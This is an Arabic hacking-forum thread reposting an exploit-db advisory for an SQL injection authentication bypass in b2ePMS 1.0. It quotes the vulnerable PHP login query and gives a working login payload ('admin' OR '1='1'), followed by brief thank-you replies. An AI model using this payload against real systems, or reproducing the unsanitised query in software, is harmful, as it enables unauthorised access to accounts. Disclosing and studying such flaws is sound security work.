ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }


النتائج 1 إلى 3 من 3

الموضوع: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

  1. #1

    Gadid ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

    [
    السلام عليكم و رحمة الله و بركاته


    #################################################
    b2ePMS 1.0 Authentication Bypass Vulnerability
    #################################################

    Discovered by: Jean Pascal Pereira <[email protected]>

    Vendor Information:

    "b2ePMS stands for Browser to Email Phone Message System. It is intended to replace the standard
    paper/carbon phone message slips commonly used in offices, with the capability of sending the message
    via a web browser form directly to the recipients inbox."

    Vendor URI: https://developer.berlios.de/projects/b2epms/

    #################################################

    Issue: SQL Injection, Authentication Bypass

    Risk level: High

    => The remote attacker has the possibility to execute arbitrary SQL Code.

    => The remote attacker is able to bypass the user authentication.

    In verify-user.php, line 20:

    -------------------------------------

    $sql = mysql_query("SELECT * FROM b2epms_user WHERE username='$username' AND user_passwd='$admin_passwd' AND activated='1' AND user_level='2'");
    $login_check = mysql_num_rows($sql);
    if($login_check > 0){
    while($row = mysql_fetch_array($sql)){
    foreach( $row AS $key => $val ){
    $$key = stripslashes( $val );
    }
    // Register session variables!
    session_register('userid');
    $_SESSION['userid'] = $user_level;
    mysql_query("UPDATE b2epms_user SET login_date=now() WHERE userid='$userid'"); $url = "Location: admin.php";
    header($url);
    }
    }

    -------------------------------------

    Exploit / Proof Of Concept:

    Perform a login with the following data:

    Username: admin' OR '1='1
    Password: x

    -------------------------------------

    #################################################


    رابط الثغره : http://www.exploit-db.com/exploits/18882




    تحياتي

  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

    آسآل آلله عز وجل ان يجعل هذا العمل شاهدا لك لا عليك ...
    بآلتوفيق عزيزى ....!!


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3

    افتراضي رد: ثغره جديده { b2ePMS 1.0 Authentication Bypass Vulnerability }

    تسلم يا غالي
    يسعدني مروركـ

المواضيع المتشابهه

  1. ثغره جديده { Galette (picture.php) SQL Injection Vulnerability }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-24-2012, 09:36 AM
  2. ثغره جديده { Sockso <=1.51 Persistent XSS }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 09:30 AM
  3. ثغره جديده اسمها vbulletin_md5
    بواسطة kapos في المنتدى قسم الثغرات
    مشاركات: 15
    آخر مشاركة: 01-11-2012, 11:15 AM
  4. ثغره جديده بالتنسيق الشعري
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 4
    آخر مشاركة: 11-27-2011, 04:01 PM
  5. Authentication Bypass in Home of MCLogin System
    بواسطة e . V . E . L في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 02-07-2011, 02:03 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •